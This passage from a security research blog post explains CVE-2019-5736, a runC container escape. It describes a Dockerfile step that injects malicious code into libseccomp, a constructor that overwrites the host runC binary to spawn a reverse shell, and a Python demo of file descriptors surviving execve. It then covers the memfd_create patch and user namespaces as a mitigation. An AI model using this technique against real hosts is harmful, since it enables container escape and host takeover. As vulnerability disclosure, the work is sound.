    cat /root/run_at_link.c >> src/api.c ;\
    DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us ;\
    dpkg -i /root/*.deb

The Dockerfile appends the content of run_at_link.c to one of libseccomp’s source files. Subsequently, the malicious libseccomp is built. The constructor attribute (a GCC-specific syntax) indicates that the run_at_link function is to be executed as an initialization function [2] for libseccomp after the dynamic linker loads the library into the runC process. Since run_at_link will be executed by the runC process, it can access the runC binary at /proc/self/exe. The runC process must exit for the runC binary to be writable though. To enforce the exit, run_at_link calls the execve syscall to execute overwrite_runc. Since execve doesn’t affect the file descriptors open by the process, the same file descriptor trick from the previous POC can be used: The runC process loads the libseccomp library and transfers execution to the run_at_link function. run_at_link opens the runC binary for reading through /proc/self/exe. This creates a file descriptor at /proc/self/fd/${runc_fd_read}. run_at_link calls execve to execute overwrite_runc. Since the process is no longer running the runC binary, overwrite_runc opens /proc/self/fd/${runc_fd_read} for writing and overwrites the runC binary. For the following video, I built a malicious image that overwrites the runC binary with a simple script that spawns a reverse shell at port 2345. The docker run command executes runC twice. Once to create and run the container, which executes the POC to overwrite runC, and then again to stop the container using runc delete [3]. The second time runC is executed, it is already overwritten, and hence the reverse shell script is executed instead.
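The claim that execve doesn't affect a process's open file descriptors, which this chain depends on, can be demonstrated with a short Python sketch (subprocess performs the fork+execve here; the file name is an arbitrary choice):

```python
import os
import subprocess
import sys
import tempfile

# Open a file descriptor in the parent, then exec a fresh Python
# process and have it write through the bare fd number, which it
# inherits across the execve.
scratch = tempfile.mkdtemp()
path = os.path.join(scratch, "out.txt")
fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)

subprocess.run(
    [sys.executable, "-c",
     "import os, sys; os.write(int(sys.argv[1]), b'written-after-exec')",
     str(fd)],
    pass_fds=(fd,),  # keep this descriptor open across fork+execve
    check=True)
os.close(fd)

with open(path) as f:
    result = f.read()
print(result)  # written-after-exec
```

In the real exploit, the descriptor opened on /proc/self/exe plays the role of fd here: it survives run_at_link's execve into overwrite_runc and keeps the runC binary reachable after the process stops running it.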
The Fix

RunC and LXC were both patched using the same approach, which is described clearly in the LXC patch commit:

To prevent this attack, LXC has been patched to create a temporary copy of the calling binary itself when it starts or attaches to containers. To do this LXC creates an anonymous, in-memory file using the memfd_create() system call and copies itself into the temporary in-memory file, which is then sealed to prevent further modifications. LXC then executes this sealed, in-memory file instead of the original on-disk binary. Any compromising write operations from a privileged container to the host LXC binary will then write to the temporary in-memory binary and not to the host binary on-disk, preserving the integrity of the host LXC binary. Also as the temporary, in-memory LXC binary is sealed, writes to this will also fail.

RunC has been patched using the same method: it re-executes from a temporary copy of itself when it starts or attaches to containers. Consequently, /proc/[runc-pid]/exe now points to the temporary file, and the runC binary can't be reached from within the container. The temporary file is also sealed to block writes to it, although overwriting it wouldn't compromise the host.

This patch introduced some issues though. The temporary runC copy is created in memory after the runc init process has already applied the container's cgroup memory constraints on itself. For containers running with a relatively low memory limit (e.g. 10MB), this can cause processes in the container to be OOM-killed (Out Of Memory killed) by the kernel when the runC init process attaches to the container. If you are interested, an issue regarding this complication was created and contains a discussion about alternative fixes that might not introduce the same problem.

CVE-2019-5736 and Privileged Containers

As a general rule of thumb, privileged containers (of a given container runtime) are less secure than unprivileged containers (of the same runtime).
Earlier I stated that the vulnerability affects all Docker containers but only LXC's privileged containers. So why are Docker unprivileged containers vulnerable while LXC unprivileged containers aren't? It's because LXC and Docker define privileged containers differently. In fact, Docker unprivileged containers are considered privileged according to the LXC philosophy, which defines a privileged container as any container where the container's uid 0 is mapped to the host's uid 0.

The main difference is that LXC runs unprivileged containers in a separate user namespace by default, while Docker doesn't. User namespaces are a feature of Linux that can be used to separate the container root from the host root: the root inside the container, as well as all other container users, is mapped to an unprivileged user on the host. In other words, a process can have root access for operations inside the container but is unprivileged for operations outside it. If you would like a more in-depth explanation, I recommend LWN's namespaces series.

So how does running the container in a user namespace mitigate this vulnerability? The attacker is root inside the container but is mapped to an unprivileged user on the host. Therefore, when the attacker tries to open the host's runC binary for writing, the kernel denies the request.

You might wonder why Docker doesn't run containers in a separate user namespace by default. It's because user namespaces do have some drawbacks in the context of containers, which are a bit out of the scope of this post. If you are interested, Docker and rkt (another container runtime) both list the limitations of running containers in user namespaces.

Ending Note

I hope this post gave you a bit of insight into the different aspects of this vulnerability. If you are using runC, Docker, or LXC, don't forget to update to the patched version. Feel free to reach out with any questions you may have through email or @TwistlockLabs.
[1] As a side note, privileged Docker containers (before the new patch) could use the /proc/[pid]/exe of the runc init process to overwrite the runC binary. To be exact, the specific privileges required are CAP_SYS_PTRACE and disabling AppArmor.

[2] For those familiar with Windows DLLs, it resembles DllMain.

[3] The container is stopped after overwrite_runc exits, since overwrite_runc was executed as the init process (PID 1) of the container.

Yuval Avrahami | Security Researcher

Yuval Avrahami is a security researcher at Twistlock, dealing with hacking and securing anything related to containers. Yuval is a veteran of the Israeli Air Force, where he served in the role of a researcher.

Source: https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/